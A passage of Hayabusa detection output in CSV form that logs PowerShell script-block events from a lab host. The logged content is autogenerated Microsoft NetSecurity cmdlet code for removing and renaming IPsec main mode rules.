[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Polic",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 
'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) 
} if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Gr",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"yStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } 
Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] 